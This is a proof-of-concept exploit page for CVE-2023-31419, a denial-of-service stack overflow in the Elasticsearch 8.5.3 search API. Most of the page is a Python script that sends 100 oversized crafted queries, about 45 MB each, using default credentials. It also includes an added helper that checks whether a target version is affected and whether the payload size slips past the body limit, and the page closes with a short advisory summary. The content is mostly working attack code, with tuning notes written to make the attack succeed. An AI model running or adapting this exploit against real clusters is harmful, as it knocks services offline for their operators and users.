Elasticsearch 8.5.3 Stack Overflow

Elasticsearch version 8.5.3 stack overflow proof of concept exploit.

Packet Storm

Exploit Author: TOUHAMI KASBAOUI

Vendor Homepage: https://elastic.co/

Version: 8.5.3 / OpenSearch

Tested on: Ubuntu 20.04 LTS

CVE : CVE-2023-31419

Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419

import requests
import random
import string

es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
index_name = '*'                  # search across every index

# Trailing junk appended to the match text: 10000 comment openers, an escaped
# double quote and 999 single quotes. (The quoting of this line is garbled on
# the Packet Storm page; this is the most likely reading of it.)
payload = "/*" * 10000 + "\"" + "'" * 999

verify_ssl = False  # set True, or a CA bundle path, when the target speaks HTTPS

username = 'elastic'
password = 'changeme'

auth = (username, password)

num_queries = 100

for i in range(num_queries):
    # 5000 random letters/digits/'^', repeated 9000 times: roughly 45 MB of
    # text per request, which stays under the 100mb default for
    # http.max_content_length, so the body is not rejected with a 413.
    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
    search_query = {
        "query": {
            "match": {
                "message": (symbols * 9000) + payload
            }
        }
    }

    print(f"Query {i + 1} - Search Query:")

    search_endpoint = f'{es_url}/{index_name}/_search'
    # Elasticsearch accepts a request body on GET _search; POST works as well.
    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)

    if response.status_code == 200:
        search_results = response.json()

        print(f"Query {i + 1} - Response:")
        print(search_results)

        total_hits = search_results['hits']['total']['value']
        print(f"Query {i + 1}: Total hits: {total_hits}")

        for hit in search_results['hits']['hits']:
            source_data = hit['_source']
            print(f"Payload result: {source_data}")
    else:
        # A node that has fallen over usually shows up here, or as a requests exception.
        print(f"Error for query {i + 1}: {response.status_code} - {response.text}")
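Before pointing the PoC above at a node, two things are worth checking offline: whether the target version is inside the affected range at all, and whether the request body the PoC builds fits under Elasticsearch's default body limit (otherwise the node answers 413 and the search layer never sees the query). The helper below is an added example for this page, not code from the Packet Storm PoC or from Elastic. It assumes the fix versions are 7.17.13 and 8.9.1 (verify against the GHSA-qwrx-45xf-jjf7 advisory), that the default http.max_content_length is 100mb, and that an OpenSearch node identifies itself with a "distribution" field in the GET / response; the sample GET / body in the main block is constructed.

```python
"""Pre-flight triage for CVE-2023-31419 (added example, not part of the PoC).

Assumptions, to be verified against the vendor advisory / GHSA-qwrx-45xf-jjf7:
  * affected: 7.0.0 <= v < 7.17.13 and 8.0.0 <= v < 8.9.1
  * OpenSearch uses its own version numbers, so it is reported, not assessed
  * the Elasticsearch default for http.max_content_length is 100mb
"""
import json
import re

FIXED_VERSIONS = {7: (7, 17, 13), 8: (8, 9, 1)}   # assumed fix versions
DEFAULT_MAX_CONTENT_LENGTH = 100 * 1024 * 1024    # Elasticsearch default 100mb


def parse_version(text):
    """'8.5.3' or '8.5.3-SNAPSHOT' -> (8, 5, 3)."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable(version):
    """True if an Elasticsearch version falls inside the assumed affected ranges."""
    v = parse_version(version)
    fixed = FIXED_VERSIONS.get(v[0])
    return fixed is not None and v < fixed


def triage(root_response_body):
    """Classify a node from the JSON body returned by GET / on port 9200.

    Returns 'opensearch' (not assessed), 'vulnerable' or 'fixed'.
    """
    info = json.loads(root_response_body)["version"]
    if info.get("distribution") == "opensearch":
        return "opensearch"
    return "vulnerable" if is_vulnerable(info["number"]) else "fixed"


def build_poc_body(symbols_len=5000, repeat=9000):
    """Rebuild one PoC request body deterministically. A fixed filler replaces
    the PoC's random symbols: the JSON size does not depend on which
    letters/digits are used, only on how many."""
    payload = "/*" * 10000 + "\"" + "'" * 999
    symbols = "A" * symbols_len
    query = {"query": {"match": {"message": symbols * repeat + payload}}}
    return json.dumps(query).encode()


def poc_body_fits(max_content_length=DEFAULT_MAX_CONTENT_LENGTH):
    """(size_in_bytes, fits) for one PoC request against the node's body limit."""
    size = len(build_poc_body())
    return size, size <= max_content_length


if __name__ == "__main__":
    # Constructed sample of what GET / returns on the version the PoC was tested on.
    sample = json.dumps({"name": "node-1", "cluster_name": "es",
                         "version": {"number": "8.5.3", "build_flavor": "default"},
                         "tagline": "You Know, for Search"})
    print("8.5.3 node:", triage(sample))
    size, fits = poc_body_fits()
    print(f"PoC body is {size / 2**20:.1f} MiB; fits the default limit: {fits}")
```

If a cluster has lowered http.max_content_length, pass that value to poc_body_fits() to see whether the PoC needs a smaller symbols block before it can reach the search code at all.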

Related news

GHSA-qwrx-45xf-jjf7: Elasticsearch vulnerable to stack overflow in the search API

A flaw was discovered in Elasticsearch affecting the `_search` API that allowed a specially crafted query string to cause a stack overflow and ultimately a denial of service.
